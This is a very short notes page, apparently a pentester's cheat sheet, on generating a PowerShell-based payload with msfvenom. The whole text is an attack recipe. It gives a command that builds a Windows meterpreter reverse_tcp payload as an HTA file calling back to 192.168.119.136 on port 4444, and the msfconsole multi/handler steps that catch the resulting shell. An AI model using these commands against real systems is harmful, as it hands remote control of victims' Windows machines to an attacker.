msfvenom payload for powershell
msfvenom payload of powershell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.136 LPORT=4444 -f hta-psh
Listen, msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost and lport
Last updated